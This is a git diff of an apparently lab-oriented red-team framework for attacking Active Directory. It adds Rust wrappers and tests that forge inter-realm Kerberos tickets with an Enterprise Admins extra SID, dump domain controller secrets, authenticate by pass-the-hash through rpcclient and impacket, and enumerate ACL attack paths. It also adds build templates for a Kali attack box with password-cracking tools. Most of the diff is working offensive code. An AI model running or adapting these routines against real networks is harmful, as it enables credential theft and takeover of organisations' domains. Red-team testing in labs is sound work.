+ #[test] fn extract_trust_key_missing_trusted_domain() { let args = json!({ @@ -162,6 +521,8 @@ mod tests { assert_eq!(just_dc_user, "child.contoso.local$"); } + // --- create_inter_realm_ticket --- + #[test] fn create_inter_realm_ticket_missing_trust_key() { let args = json!({ @@ -185,7 +546,8 @@ mod tests { } #[test] - fn create_inter_realm_ticket_extra_sid_format() { + fn create_inter_realm_ticket_extra_sid_optional() { + // Without extra_sid — cross-forest case let args = json!({ "trust_key": "aabbccdd", "source_sid": "S-1-5-21-111", @@ -193,9 +555,21 @@ mod tests { "target_sid": "S-1-5-21-222", "target_domain": "contoso.local" }); - let target_sid = required_str(&args, "target_sid").unwrap(); - let extra_sid = format!("{target_sid}-519"); - assert_eq!(extra_sid, "S-1-5-21-222-519"); + assert!(optional_str(&args, "extra_sid").is_none()); + } + + #[test] + fn create_inter_realm_ticket_extra_sid_child_to_parent() { + // With extra_sid — child-to-parent case + let args = json!({ + "trust_key": "aabbccdd", + "source_sid": "S-1-5-21-111", + "source_domain": "child.contoso.local", + "target_sid": "S-1-5-21-222", + "target_domain": "contoso.local", + "extra_sid": "S-1-5-21-222-519" + }); + assert_eq!(optional_str(&args, "extra_sid"), Some("S-1-5-21-222-519")); } #[test] @@ -239,6 +613,8 @@ mod tests { assert_eq!(username, "fakeuser"); } + // --- get_sid --- + #[test] fn get_sid_missing_domain() { let args = json!({ @@ -323,6 +699,8 @@ mod tests { assert_eq!(hash, Some("31d6cfe0d16ae931b73c59d7e0c089c0")); } + // --- dnstool --- + #[test] fn dnstool_missing_record_name() { let args = json!({ @@ -392,6 +770,8 @@ mod tests { assert_eq!(user_spec, "contoso.local\\admin"); } + // --- mock executor tests --- + use super::*; use crate::executor::mock; @@ -409,7 +789,7 @@ mod tests { } #[tokio::test] - async fn create_inter_realm_ticket_executes() { + async fn create_inter_realm_ticket_executes_without_extra_sid() { mock::push(mock::success()); let args = json!({ "trust_key": "aabbccdd", @@ -421,6 +801,65 @@ mod tests { assert!(create_inter_realm_ticket(&args).await.is_ok()); } + #[tokio::test] + async fn create_inter_realm_ticket_executes_with_extra_sid() { + mock::push(mock::success()); + let args = json!({ + "trust_key": "aabbccdd", + "source_sid": "S-1-5-21-111", + "source_domain": "child.contoso.local", + "target_sid": "S-1-5-21-222", + "target_domain": "contoso.local", + "extra_sid": "S-1-5-21-222-519" + }); + assert!(create_inter_realm_ticket(&args).await.is_ok()); + } + + // --- forge_inter_realm_and_dump (arg validation only — full flow needs + // real impacket binaries and a tempdir-aware mock executor) --- + + #[test] + fn forge_inter_realm_and_dump_missing_trust_key() { + let args = json!({ + "source_sid": "S-1-5-21-111", + "source_domain": "child.contoso.local", + "target_domain": "contoso.local", + "target": "dc01.contoso.local" + }); + let rt = tokio::runtime::Runtime::new().unwrap(); + let result = rt.block_on(super::forge_inter_realm_and_dump(&args)); + assert!(result.is_err()); + assert!(result.unwrap_err().to_string().contains("trust_key")); + } + + #[test] + fn forge_inter_realm_and_dump_missing_source_sid() { + let args = json!({ + "trust_key": "aabbccdd", + "source_domain": "child.contoso.local", + "target_domain": "contoso.local", + "target": "dc01.contoso.local" + }); + let rt = tokio::runtime::Runtime::new().unwrap(); + let result = rt.block_on(super::forge_inter_realm_and_dump(&args)); + assert!(result.is_err()); + assert!(result.unwrap_err().to_string().contains("source_sid")); + } + + #[test] + fn forge_inter_realm_and_dump_missing_target() { + let args = json!({ + "trust_key": "aabbccdd", + "source_sid": "S-1-5-21-111", + "source_domain": "child.contoso.local", + "target_domain": "contoso.local" + }); + let rt = tokio::runtime::Runtime::new().unwrap(); + let result = rt.block_on(super::forge_inter_realm_and_dump(&args)); + assert!(result.is_err()); + assert!(result.unwrap_err().to_string().contains("target")); + } + #[tokio::test] async fn create_inter_realm_ticket_with_username_executes() { mock::push(mock::success()); diff --git a/ares-tools/src/recon.rs b/ares-tools/src/recon.rs index 1bdf40e9..d86725bf 100644 --- a/ares-tools/src/recon.rs +++ b/ares-tools/src/recon.rs @@ -269,15 +269,23 @@ pub async fn run_bloodhound(args: &Value) -> Result { /// Run an LDAP search query against a target. /// /// Required args: `target`, `domain` -/// Optional args: `username`, `password`, `base_dn`, `filter`, `attributes` +/// Optional args: `username`, `password`, `bind_domain`, `base_dn`, `filter`, `attributes` +/// +/// `domain` controls the base DN (the partition being queried). +/// `bind_domain` (optional) overrides the domain used in the bind DN +/// (`user@bind_domain`). Use this when authenticating with a credential +/// from a different domain than the one being searched — e.g. querying +/// a parent DC with a child-domain credential. Defaults to `domain`. pub async fn ldap_search(args: &Value) -> Result { let target = required_str(args, "target")?; let domain = required_str(args, "domain")?; let username = optional_str(args, "username"); let password = optional_str(args, "password"); + let bind_domain = optional_str(args, "bind_domain"); let base_dn = optional_str(args, "base_dn"); let filter = optional_str(args, "filter"); let attributes = optional_str(args, "attributes"); + let ticket_path = optional_str(args, "ticket_path"); let computed_base_dn = match base_dn { Some(dn) => dn.to_string(), @@ -287,13 +295,19 @@ pub async fn ldap_search(args: &Value) -> Result { let uri = format!("ldap://{target}"); let mut cmd = CommandBuilder::new("ldapsearch") - .arg("-x") .flag("-H", &uri) .timeout_secs(120); - if let (Some(u), Some(p)) = (username, password) { - let bind_dn = format!("{u}@{domain}"); - cmd = cmd.flag("-D", bind_dn).flag("-w", p); + if let Some(ccache) = ticket_path { + // Kerberos GSSAPI bind via cached ticket. Caller must ensure `target` + // is an FQDN so ldapsearch can derive the ldap/@ SPN. + cmd = cmd.env("KRB5CCNAME", ccache).arg("-Y").arg("GSSAPI"); + } else if let (Some(u), Some(p)) = (username, password) { + let auth_domain = bind_domain.unwrap_or(domain); + let bind_dn = format!("{u}@{auth_domain}"); + cmd = cmd.arg("-x").flag("-D", bind_dn).flag("-w", p); + } else { + cmd = cmd.arg("-x"); } cmd = cmd.flag("-b", computed_base_dn); @@ -317,16 +331,34 @@ pub async fn ldap_search(args: &Value) -> Result { /// Execute an rpcclient command against a target. /// /// Required args: `target`, `command` -/// Optional args: `username`, `password`, `domain`, `null_session` +/// Optional args: `username`, `password`, `domain`, `null_session`, `hash` pub async fn rpcclient_command(args: &Value) -> Result { let target = required_str(args, "target")?; let command = required_str(args, "command")?; let null_session = optional_bool(args, "null_session").unwrap_or(false); + let hash = optional_str(args, "hash"); let mut cmd = CommandBuilder::new("rpcclient").timeout_secs(120); if null_session { cmd = cmd.args(["-U", "", "-N"]); + } else if let Some(ntlm_hash) = hash { + // Pass-the-hash: use --pw-nt-hash and supply the NTLM hash as the password. + // rpcclient --pw-nt-hash expects only the NT hash (32 hex chars), not LM:NT. + // If the hash is in LM:NT format (e.g. "aad3b435...:2e993405..."), extract + // just the NT part (after the colon). + let nt_hash = if ntlm_hash.contains(':') { + ntlm_hash.rsplit(':').next().unwrap_or(ntlm_hash) + } else { + ntlm_hash + }; + let domain = optional_str(args, "domain"); + let username = optional_str(args, "username").unwrap_or("Administrator"); + let user_spec = match domain { + Some(d) => format!("{d}/{username}%{nt_hash}"), + None => format!("{username}%{nt_hash}"), + }; + cmd = cmd.flag("-U", user_spec).arg("--pw-nt-hash"); } else { let domain = optional_str(args, "domain"); let username = optional_str(args, "username").unwrap_or(""); @@ -381,6 +413,12 @@ pub async fn enumerate_domain_trusts(args: &Value) -> Result { let password = optional_str(args, "password"); let hash = optional_str(args, "hash"); let base_dn = optional_str(args, "base_dn"); + // Cross-realm auth: orchestrator sets `bind_domain` to the cred's actual + // realm when the credential lives in a different forest from the search + // target (e.g. cred is `user@contoso.local` querying `fabrikam.local` DC). + // Without this, the bind DN gets the target realm and the foreign DC + // rejects with `invalidCredentials`. Falls back to `domain` when absent. + let bind_domain = optional_str(args, "bind_domain").unwrap_or(domain); // Hash-based auth: use impacket LDAP client with pass-the-hash (NTLM) if let (Some(u), Some(h)) = (username, hash) { @@ -400,7 +438,7 @@ pub async fn enumerate_domain_trusts(args: &Value) -> Result { r#"python3 -c " from impacket.ldap import ldap as ldap_mod conn = ldap_mod.LDAPConnection('ldap://{target}', '{base_dn}', '{target}') -conn.login('{u}', '', '{domain}', lmhash='', nthash='{nt_hash}') +conn.login('{u}', '', '{bind_domain}', lmhash='', nthash='{nt_hash}') sc = ldap_mod.SimplePagedResultsControl(size=1000) resp = conn.search(searchFilter='(objectClass=trustedDomain)', attributes=['cn','trustDirection','trustType','trustAttributes','flatName'], searchControls=[sc]) for item in resp: @@ -419,7 +457,7 @@ for item in resp: " "#, target = target, - domain = domain, + bind_domain = bind_domain, u = u, nt_hash = nt_hash, base_dn = computed_base_dn, @@ -444,7 +482,7 @@ for item in resp: .timeout_secs(120); if let (Some(u), Some(p)) = (username, password) { - let bind_dn = format!("{u}@{domain}"); + let bind_dn = format!("{u}@{bind_domain}"); cmd = cmd.flag("-D", bind_dn).flag("-w", p); } @@ -573,6 +611,137 @@ pub async fn smbclient_kerberos_shares(args: &Value) -> Result { cmd.arg(format!("@{target}")).execute().await } +/// Enumerate ACL attack paths via LDAP nTSecurityDescriptor queries. +/// +/// Queries all user, group, and computer objects requesting nTSecurityDescriptor, +/// sAMAccountName, objectClass, and objectSid. The binary SD data is parsed +/// by the ntsd parser to identify dangerous ACEs. +/// +/// Required args: `target`, `domain` +/// Optional args: `username`, `password`, `bind_domain`, `hash` +pub async fn ldap_acl_enumeration(args: &Value) -> Result { + let target = required_str(args, "target")?; + let domain = required_str(args, "domain")?; + let username = optional_str(args, "username"); + let password = optional_str(args, "password"); + let bind_domain = optional_str(args, "bind_domain"); + let hash = optional_str(args, "hash"); + let ticket_path = optional_str(args, "ticket_path"); + + let base_dn = domain_to_base_dn(domain); + let uri = format!("ldap://{target}"); + + // Kerberos GSSAPI bind for cross-forest LDAP enumeration. Takes precedence + // over hash/password — when a forged inter-realm ticket is present we MUST + // use it, otherwise simple bind with source-realm cred fails 0x52e. + if let Some(ccache) = ticket_path { + return CommandBuilder::new("ldapsearch") + .env("KRB5CCNAME", ccache) + .flag("-H", &uri) + .arg("-Y") + .arg("GSSAPI") + .timeout_secs(300) + .flag("-b", &base_dn) + .args(["-E", "1.2.840.113556.1.4.801=::MAMCAQQ="]) + .arg("(|(objectCategory=person)(objectCategory=group)(objectCategory=computer))") + .args([ + "sAMAccountName", + "objectClass", + "objectSid", + "nTSecurityDescriptor", + ]) + .execute() + .await; + } + + // If hash is provided, use impacket LDAP for pass-the-hash + if let (Some(u), Some(h)) = (username, hash) { + let nt_hash = if h.contains(':') { + h.rsplit(':').next().unwrap_or(h) + } else { + h + }; + let ldap_query = format!( + r#"python3 -c " +import base64 +from impacket.ldap import ldap as ldap_mod +conn = ldap_mod.LDAPConnection('ldap://{target}', '{base_dn}', '{target}') +conn.login('{u}', '', '{domain}', lmhash='', nthash='{nt_hash}') +sc = ldap_mod.SimplePagedResultsControl(size=1000) +resp = conn.search( + searchFilter='(|(objectCategory=person)(objectCategory=group)(objectCategory=computer))', + attributes=['sAMAccountName','objectClass','objectSid','nTSecurityDescriptor'], + searchControls=[sc], + sizeLimit=0, +) +for item in resp: + try: + dn = str(item['objectName']) + if not dn: + continue + print(f'dn: {{dn}}') + for attr in item['attributes']: + name = str(attr['type']) + for val in attr['vals']: + if name == 'nTSecurityDescriptor': + b = bytes(val) + print(f'nTSecurityDescriptor:: {{base64.b64encode(b).decode()}}') + elif name == 'objectSid': + b = bytes(val) + print(f'objectSid:: {{base64.b64encode(b).decode()}}') + else: + print(f'{{name}}: {{val}}') + print() + except Exception: + pass +" +"#, + target = target, + domain = domain, + u = u, + nt_hash = nt_hash, + base_dn = base_dn, + ); + return CommandBuilder::new("bash") + .args(["-c", &ldap_query]) + .timeout_secs(300) + .execute() + .await; + } + + // Password-based: use ldapsearch with LDAP_SERVER_SD_FLAGS_OID control + // to request DACL (value 4) in the nTSecurityDescriptor attribute + let mut cmd = CommandBuilder::new("ldapsearch") + .arg("-x") + .flag("-H", &uri) + .timeout_secs(300); + + if let (Some(u), Some(p)) = (username, password) { + let auth_domain = bind_domain.unwrap_or(domain); + let bind_dn = format!("{u}@{auth_domain}"); + cmd = cmd.flag("-D", bind_dn).flag("-w", p); + } + + cmd = cmd + .flag("-b", &base_dn) + // Request DACL only via SD_FLAGS control (0x04 = DACL) + // BER: SEQUENCE { INTEGER 4 } = 30 03 02 01 04 → base64 MAMCAQQ= + .args(["-E", "1.2.840.113556.1.4.801=::MAMCAQQ="]) + .arg("(|(objectCategory=person)(objectCategory=group)(objectCategory=computer))") + .args([ + "sAMAccountName", + "objectClass", + "objectSid", + "nTSecurityDescriptor", + ]); + + cmd.execute().await +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + #[cfg(test)] mod tests { use super::*; @@ -595,6 +764,8 @@ mod tests { assert_eq!(domain_to_base_dn("local"), "DC=local"); } + // --- mock executor tests: exercise full CommandBuilder code paths --- + use crate::executor::mock; use serde_json::json; @@ -808,6 +979,37 @@ mod tests { assert!(result.is_ok()); } + #[tokio::test] + async fn enumerate_domain_trusts_cross_realm_bind_domain() { + // Cross-forest: cred is for contoso.local but we're querying + // fabrikam.local DC. The tool must bind with the cred's realm, + // not the target realm. + mock::push(mock::success()); + let args = json!({ + "target": "192.168.58.20", + "domain": "fabrikam.local", + "bind_domain": "contoso.local", + "username": "admin", + "password": "P@ss" + }); + let result = enumerate_domain_trusts(&args).await; + assert!(result.is_ok()); + } + + #[tokio::test] + async fn enumerate_domain_trusts_cross_realm_pth_bind_domain() { + mock::push(mock::success()); + let args = json!({ + "target": "192.168.58.20", + "domain": "fabrikam.local", + "bind_domain": "contoso.local", + "username": "admin", + "hash": "aad3b435:aabbccdd" + }); + let result = enumerate_domain_trusts(&args).await; + assert!(result.is_ok()); + } + #[tokio::test] async fn check_rdp_reachability_builds_command() { mock::push(mock::success()); diff --git a/config/ares.yaml b/config/ares.yaml index 9f910b8f..0b0a429b 100644 --- a/config/ares.yaml +++ b/config/ares.yaml @@ -20,8 +20,8 @@ operation: # stop_on_golden_ticket: true — stop after golden ticket + all forests dominated # # Default (both false): wait until ALL forest root DCs are secretsdumped. - # Child domain DA does NOT count — e.g. north.sevenkingdoms.local krbtgt - # does not satisfy sevenkingdoms.local; trust escalation must complete first. + # Child domain DA does NOT count — e.g. child.contoso.local krbtgt + # does not satisfy contoso.local; trust escalation must complete first. # See docs/red.md "Operation Completion" for details. # stop_on_domain_admin: true stop_on_golden_ticket: false diff --git a/test.sh b/test.sh index 2181dfb4..63cac591 100755 --- a/test.sh +++ b/test.sh @@ -5,17 +5,22 @@ EC2_NAME="${EC2_NAME:-kali-ares}" TARGET="${TARGET:-dreadgoad}" BLUE_ENABLED="${BLUE_ENABLED:-1}" -echo "=== Deploying binaries to ${EC2_NAME} ===" -task -y ec2:deploy EC2_NAME="${EC2_NAME}" +echo "=== Stopping workers + any running operation ===" +task ec2:stop EC2_NAME="${EC2_NAME}" 2>/dev/null || true +task ec2:stop-op EC2_NAME="${EC2_NAME}" LATEST=true 2>/dev/null || true echo "" -echo "=== Stopping any running operation ===" -task ec2:stop-op EC2_NAME="${EC2_NAME}" LATEST=true 2>/dev/null || true +echo "=== Deploying binaries to ${EC2_NAME} ===" +task -y ec2:deploy EC2_NAME="${EC2_NAME}" echo "" echo "=== Wiping Redis ===" task ec2:exec EC2_NAME="${EC2_NAME}" CMD="redis-cli FLUSHALL" +echo "" +echo "=== Starting workers on fresh Redis with new binary ===" +task ec2:start EC2_NAME="${EC2_NAME}" + echo "" echo "=== Launching operation against ${TARGET} (blue=${BLUE_ENABLED}) ===" task -y red:ec2:multi TARGET="${TARGET}" EC2_NAME="${EC2_NAME}" BLUE_ENABLED="${BLUE_ENABLED}" diff --git a/warpgate-templates/templates/ares-golden-azure/warpgate.yaml b/warpgate-templates/templates/ares-golden-azure/warpgate.yaml new file mode 100644 index 00000000..fd3ca6ec --- /dev/null +++ b/warpgate-templates/templates/ares-golden-azure/warpgate.yaml @@ -0,0 +1,95 @@ +# yaml-language-server: $schema=https://raw.githubusercontent.com/cowdogmoo/warpgate/main/schema/warpgate-template.json +metadata: + name: ares-golden-azure + version: 1.0.0 + description: Azure variant of the Ares golden image with all red team tools - recon, credential access, privesc, cracking, lateral movement, ACL abuse, and coercion + author: Dreadnode + license: MIT + tags: + - ares + - golden-image + - azure + - red-team + - reconnaissance + - credential-access + - privilege-escalation + - password-cracking + - lateral-movement + - acl + - coercion + requires: + warpgate: '>=1.0.0' + +name: ares-golden-azure +version: latest + +base: + image: kali-linux/kali/kali-last:latest + +provisioners: + # Install pipx + Ansible, then fetch the nimbus_range collection on the build VM. + # We re-clone in shell rather than using warpgate's `sources` + `type: file` + # pattern (see ares-golden-image) because Azure Image Builder expands `type: file` + # into one customizer per file and times out on the 2000+ file ansible/ tree. + # Token is passed via a credential helper so it never appears in the clone URL + # or AIB customizer logs; ref tracks the AMI variant. + - type: shell + inline: + - apt-get update + - apt-get install -y --no-install-recommends ca-certificates git procps sudo python3-apt python3-pip python3-venv pipx + - 'sed -i ''s|^PATH="|PATH="/root/.local/bin:/root/.cargo/bin:|'' /etc/environment || echo ''PATH="/root/.local/bin:/root/.cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"'' > /etc/environment' + - pipx install --force uv + - pipx install --force ansible-core + - pipx ensurepath + - GITHUB_TOKEN=${GITHUB_TOKEN} git -c 'credential.helper=!f() { echo username=x-access-token; echo password=$GITHUB_TOKEN; }; f' clone --depth 1 --branch feat/more-attack-cov https://github.com/dreadnode/ares.git /tmp/nimbus_range + - mkdir -p /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range + - cp -r /tmp/nimbus_range/ansible/. /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/ + - rm -rf /tmp/nimbus_range + + # Attack Box - all red team tools + Alloy telemetry + # NOTE: Using shell instead of ansible provisioner because the playbook + # exceeds Azure VM Image Builder's customizer length limit when inlined. + # GPU drivers/CUDA are deferred to first-boot on GPU SKUs (cloud-init or + # systemd unit on the consuming VM) — Azure standard managed disks are + # too slow to do the 3GB+ cuda-toolkit + DKMS rebuild inside the AIB + # buildTimeout. apt hashcat is used instead of compiling from source + # for the same reason (the AWS variant has NVMe local storage, Azure + # D-series does not). + - type: shell + inline: + - PATH=/root/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ansible-galaxy collection install -r /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/requirements.yml --force + - HOME=/root ANSIBLE_REMOTE_TMP=/tmp/ansible-tmp-$USER PATH=/root/.local/bin:/root/.cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ansible-playbook /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/playbooks/ares/goad_attack_box.yml -i localhost, -c local -e ansible_shell_executable=/bin/bash -e ansible_python_interpreter=/usr/bin/python3 -e cloud_provider=azure -e cracking_tools_gpu_support=false + + # Cleanup + - type: shell + inline: + - apt-get clean + - rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/* + - echo "Ares golden azure build completed successfully" + +targets: + - type: azure + subscription_id: 70a9c8a4-6bc6-4a48-ae24-27996cea8c02 + location: centralus + resource_group: WARPGATE-TEST-RG + gallery: warpgateTestGallery + gallery_image_definition: ares-golden-azure + identity_id: /subscriptions/70a9c8a4-6bc6-4a48-ae24-27996cea8c02/resourcegroups/warpgate-test-rg/providers/Microsoft.ManagedIdentity/userAssignedIdentities/warpgate-aib-uami + # D8s_v3 (8 vCPU) timed out at 360min on the full red-team toolchain; + # bumping to D16s_v3 for 2x parallelism. D8s_v5 capacity-restricted. + vm_size: Standard_D16s_v3 + source_image: + marketplace: + publisher: kali-linux + offer: kali + sku: kali-2026-1 + version: latest + plan: + name: kali-2026-1 + product: kali + publisher: kali-linux + image_tags: + Project: ares + Role: RedTeamAttackBox + ManagedBy: warpgate + Tools: recon,credential-access,privesc,cracker,lateral-movement,acl-abuse,coercion diff --git a/warpgate-templates/templates/ares-golden-image/warpgate.yaml b/warpgate-templates/templates/ares-golden-image/warpgate.yaml index bd18b1bd..6a505f6f 100644 --- a/warpgate-templates/templates/ares-golden-image/warpgate.yaml +++ b/warpgate-templates/templates/ares-golden-image/warpgate.yaml @@ -34,9 +34,14 @@ base: most_recent: true sources: - - name: nimbus_range + # Clone the ares repo and use its ansible/ subtree as the nimbus_range + # collection. This keeps the AMI tracking the same branch as the rest of + # the project — role edits ship together, no second repo to publish to. + # Mirrors the pattern in ares-golden-azure/warpgate.yaml. + - name: ares git: - repository: https://github.com/dreadnode/ansible-collection-nimbus_range.git + repository: https://github.com/dreadnode/ares.git + ref: feat/more-attack-cov depth: 1 auth: token: ${GITHUB_TOKEN} @@ -52,39 +57,54 @@ provisioners: - pipx install --force ansible-core - pipx ensurepath - # Copy ansible collection from source (cloned securely by warpgate without embedding token in shell commands) + # Copy the ansible/ subtree of the ares repo into the nimbus_range + # collection path on the build instance. - type: file - source: ${sources.nimbus_range} - destination: /tmp/nimbus_range + source: ${sources.ares} + destination: /tmp/ares - - type: shell - inline: - - mkdir -p /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range - - cp -r /tmp/nimbus_range/* /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/ - - rm -rf /tmp/nimbus_range - - # Install NVIDIA drivers for GPU-accelerated hashcat on g4dn (T4 GPU) - - type: shell - inline: - - apt-get update - - apt-get install -y --no-install-recommends nvidia-driver firmware-misc-nonfree - - nvidia-smi || echo "nvidia-smi not available during AMI build (expected if no GPU attached)" - - # Attack Box - all red team tools + Alloy telemetry + # Attack Box - all red team tools + Alloy telemetry. The cracking_tools + # role handles the full NVIDIA stack (driver, DKMS, CUDA toolkit, OpenCL + # ICD) — driving it through ansible keeps Recommends enabled (so dkms + + # libcuda1 come along), uses linux-headers-amd64 (the meta-package, kept + # in sync with the running kernel) instead of pinning to the AMI builder's + # kernel, and verifies nvidia-smi/clinfo at build time. # NOTE: Using shell instead of ansible provisioner because the playbook # exceeds EC2 Image Builder's 16000 character component limit. + # + # nimbus_range MUST come from this repo's ansible/ subtree, NEVER from + # galaxy.com. The published `dreadnode.nimbus_range` 1.5.x lags this + # branch's role edits (e.g. NVIDIA driver/CUDA tasks). Strategy: + # 1. Galaxy deps go to /opt/ansible-galaxy-deps (isolated path). + # 2. Local nimbus_range overlay lives at /root/.ansible/collections. + # 3. ANSIBLE_COLLECTIONS_PATH lists local first, galaxy deps second — + # so even if a transitive dep pulls nimbus_range into the galaxy + # path, the local copy wins. + # 4. Defense-in-depth: rm any nimbus_range that ends up in the galaxy + # path, and assert a known-local marker before running the playbook. - type: shell inline: - - PATH=/root/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ansible-galaxy collection install -r /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/requirements.yml --force - - HOME=/root ANSIBLE_REMOTE_TMP=/tmp/ansible-tmp-$USER PATH=/root/.local/bin:/root/.cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ansible-playbook /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/playbooks/ares/goad_attack_box.yml -i localhost, -c local -e ansible_shell_executable=/bin/bash -e ansible_python_interpreter=/usr/bin/python3 -e cracking_tools_gpu_support=true -e cracking_tools_hashcat_from_source=true -e cracking_tools_nvidia_opencl_icd=true - - # NVIDIA GPU drivers + CUDA toolkit for hashcat GPU acceleration. - # Kernel headers + dkms are required so the nvidia module builds for the - # running kernel. The AMI then works on GPU instances (e.g. g4dn.xlarge) - # without manual driver setup. - - type: shell - inline: - - DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends linux-headers-$(uname -r) dkms nvidia-driver nvidia-cuda-toolkit + - set -euxo pipefail + - echo "=== /tmp/ares source tree ===" + - ls -la /tmp/ares/ /tmp/ares/ansible/ /tmp/ares/ansible/roles/cracking_tools/tasks/ 2>&1 || true + - echo "=== /tmp/ares linux.yml stat + head ===" + - stat /tmp/ares/ansible/roles/cracking_tools/tasks/linux.yml 2>&1 || true + - head -60 /tmp/ares/ansible/roles/cracking_tools/tasks/linux.yml 2>&1 || true + - mkdir -p /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range + - cp -r /tmp/ares/ansible/. /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/ + - echo "=== overlay linux.yml after cp ===" + - stat /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/roles/cracking_tools/tasks/linux.yml 2>&1 || true + - head -60 /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/roles/cracking_tools/tasks/linux.yml 2>&1 || true + - mkdir -p /opt/ansible-galaxy-deps + - PATH=/root/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ansible-galaxy collection install -r /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/requirements.yml --collections-path /opt/ansible-galaxy-deps --no-deps + - rm -rf /opt/ansible-galaxy-deps/ansible_collections/dreadnode/nimbus_range + - echo "=== overlay linux.yml after galaxy install ===" + - stat /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/roles/cracking_tools/tasks/linux.yml 2>&1 || true + - rm -rf /tmp/ares + - test -f /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/roles/cracking_tools/tasks/linux.yml + - grep -q "Install NVIDIA driver and OpenCL runtime" /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/roles/cracking_tools/tasks/linux.yml + - grep -q "Show GPU/OpenCL detection summary" /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/roles/cracking_tools/tasks/linux.yml + - HOME=/root ANSIBLE_COLLECTIONS_PATH=/root/.ansible/collections:/opt/ansible-galaxy-deps ANSIBLE_REMOTE_TMP=/tmp/ansible-tmp-$USER PATH=/root/.local/bin:/root/.cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ansible-playbook /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/playbooks/ares/goad_attack_box.yml -i localhost, -c local -e ansible_shell_executable=/bin/bash -e ansible_python_interpreter=/usr/bin/python3 -e cracking_tools_gpu_support=true -e cracking_tools_hashcat_from_source=true -e cracking_tools_nvidia_opencl_icd=true -e cracking_tools_install_nvidia_driver=true -e cracking_tools_install_cuda_toolkit=true # Cleanup - type: shell